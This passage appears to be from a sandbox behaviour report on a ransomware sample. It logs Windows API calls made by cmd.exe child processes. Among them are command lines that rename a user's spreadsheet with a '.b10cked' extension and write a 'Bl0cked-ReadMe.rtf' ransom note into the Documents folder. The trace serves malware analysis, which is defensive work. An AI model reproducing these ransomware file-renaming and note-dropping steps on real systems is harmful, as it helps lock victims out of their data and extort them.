lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x9, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegCloseKey (hKey=0x40) returned 0x0 [0129.373] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886363 [0129.373] srand (_Seed=0x5b886363) [0129.373] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked\"" [0129.373] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked\"" [0129.374] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0129.374] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0129.374] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.374] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.374] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.374] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0129.374] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0129.374] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0129.374] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0129.374] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0129.374] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0129.374] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0129.374] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0129.374] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0129.374] GetEnvironmentStringsW () returned 0x2b22b8* [0129.374] FreeEnvironmentStringsW (penv=0x2b22b8) returned 1 [0129.374] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.374] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.374] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0129.374] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0129.375] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") 
returned 8 [0129.375] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0129.375] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0129.375] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0129.375] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0129.375] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0129.375] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f4a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.375] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f4a8, lpFilePart=0x26f4a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f4a4*="Desktop") returned 0x18 [0129.375] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.375] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f224 | out: lpFindFileData=0x26f224) returned 0x2afff8 [0129.375] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0129.375] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f224 | out: lpFindFileData=0x26f224) returned 0x2afff8 [0129.375] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0129.375] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f224 | out: lpFindFileData=0x26f224) returned 0x2afff8 [0129.375] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0129.375] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.376] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0129.376] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0129.376] GetEnvironmentStringsW () returned 0x2b2ad8* [0129.376] FreeEnvironmentStringsW (penv=0x2b2ad8) 
returned 1 [0129.376] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.376] GetConsoleOutputCP () returned 0x1b5 [0129.377] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.377] GetUserDefaultLCID () returned 0x409 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f5e8, cchData=128 | out: lpLCData="0") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f5e8, cchData=128 | out: lpLCData="0") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f5e8, cchData=128 | out: lpLCData="1") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0129.377] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0129.378] GetConsoleTitleW (in: lpConsoleTitle=0x2a08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.378] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.378] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0129.378] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0129.378] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0129.379] _wcsicmp (_String1="move", _String2=")") returned 68 [0129.379] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0129.379] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0129.379] _wcsicmp (_String1="IF", _String2="move") returned -4 [0129.379] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0129.379] _wcsicmp (_String1="REM", _String2="move") returned 5 [0129.379] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0129.382] GetConsoleTitleW (in: lpConsoleTitle=0x26f2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.382] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0129.382] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0129.382] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0129.382] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0129.382] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0129.382] _wcsicmp (_String1="move", _String2="CD") returned 10 [0129.382] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0129.382] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0129.382] _wcsicmp (_String1="move", _String2="REN") returned -5 [0129.382] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0129.382] _wcsicmp (_String1="move", _String2="SET") returned -6 
[0129.382] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0129.382] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0129.382] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0129.382] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0129.382] _wcsicmp (_String1="move", _String2="MD") returned 11 [0129.382] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0129.382] _wcsicmp (_String1="move", _String2="RD") returned -5 [0129.382] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0129.382] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0129.382] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0129.382] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0129.382] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0129.382] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0129.382] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0129.382] _wcsicmp (_String1="move", _String2="VER") returned -9 [0129.382] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0129.382] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0129.383] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0129.383] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0129.383] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0129.383] _wcsicmp (_String1="move", _String2="START") returned -6 [0129.383] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0129.383] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0129.383] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0129.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0129.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0129.384] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f09c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f094, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: 
lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f094*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", 
_String2="Program", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0129.385] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0129.385] _wcsicmp (_String1="7JMXGW~1.XLS", _String2=".") returned 9 [0129.385] _wcsicmp (_String1="7JMXGW~1.XLS", _String2="..") returned 9 [0129.385] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgw~1.xls")) returned 0x20 [0129.386] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.386] SetErrorMode (uMode=0x0) returned 0x0 [0129.386] SetErrorMode (uMode=0x1) returned 0x0 [0129.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", nBufferLength=0x104, lpBuffer=0x26ea24, lpFilePart=0x26ea0c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", lpFilePart=0x26ea0c*="7JMXGW~1.XLS") returned 0x26 [0129.386] SetErrorMode (uMode=0x0) returned 0x1 [0129.386] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x11 [0129.386] _wcsicmp (_String1="7JMXGW~1.XLS", _String2=".") returned 9 [0129.386] _wcsicmp (_String1="7JMXGW~1.XLS", _String2="..") returned 9 [0129.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgw~1.xls")) returned 0x20 [0129.386] SetErrorMode (uMode=0x0) returned 0x0 [0129.386] SetErrorMode (uMode=0x1) returned 0x0 [0129.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", nBufferLength=0x104, lpBuffer=0x26eea0, lpFilePart=0x26ec38 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", lpFilePart=0x26ec38*="7JMXGW~1.XLS") returned 0x26 [0129.386] SetErrorMode (uMode=0x0) returned 0x1 [0129.386] SetErrorMode (uMode=0x0) returned 0x0 [0129.386] SetErrorMode (uMode=0x1) returned 0x0 [0129.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26f0a8, lpFilePart=0x26ec38 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked", lpFilePart=0x26ec38*="7jmxgwY9.xlsx.b10cked") returned 0x2f [0129.386] SetErrorMode (uMode=0x0) returned 0x1 [0129.386] SetLastError (dwErrCode=0x0) [0129.387] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgwy9.xlsx.b10cked")) returned 0xffffffff [0129.387] GetLastError () returned 0x2 [0129.387] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x26e5b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e5b4) returned 0x2a0ee8 [0129.387] FindNextFileW (in: hFindFile=0x2a0ee8, lpFindFileData=0x26e5b4 | out: lpFindFileData=0x26e5b4) returned 0 [0129.387] GetLastError () returned 0x12 [0129.387] FindClose (in: hFindFile=0x2a0ee8 | out: hFindFile=0x2a0ee8) returned 1 
[0129.388] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x2b1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1ae0) returned 0x2a0ee8 [0129.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked", lpFilePart=0x0) returned 0x2f [0129.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx", nBufferLength=0x104, lpBuffer=0x26e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx", lpFilePart=0x0) returned 0x27 [0129.388] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgwy9.xlsx")) returned 0x20 [0129.388] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgwy9.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgwy9.xlsx.b10cked"), dwFlags=0x3) returned 1 [0129.389] FindClose (in: hFindFile=0x2a0ee8 | out: hFindFile=0x2a0ee8) returned 1 [0129.389] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26e800 | out: _Buffer=" 1") returned 9 [0129.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.389] GetFileType (hFile=0x7) returned 0x2 [0129.548] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0129.548] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26e78c | out: lpMode=0x26e78c) returned 1 [0129.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.548] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26e7c0 | out: lpConsoleScreenBufferInfo=0x26e7c0) returned 1 [0129.548] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, 
lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0129.548] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26e800 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0129.549] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26e7e4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26e7e4*=0x1a) returned 1 [0129.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.549] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.549] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.549] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.549] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.549] SetConsoleInputExeNameW () returned 0x1 [0129.549] GetConsoleOutputCP () returned 0x1b5 [0129.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.550] exit (_Code=0) Process: id = "93" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0x938" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT 
AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11131 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11132 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11133 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11134 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11135 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11136 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11137 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11138 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11139 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 11140 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11175 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11176 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11177 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11178 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 11179 start_va = 0x660000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 11180 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11181 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11182 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11183 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11184 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11185 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name 
= "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11186 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11187 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11188 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11189 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11190 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11191 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename 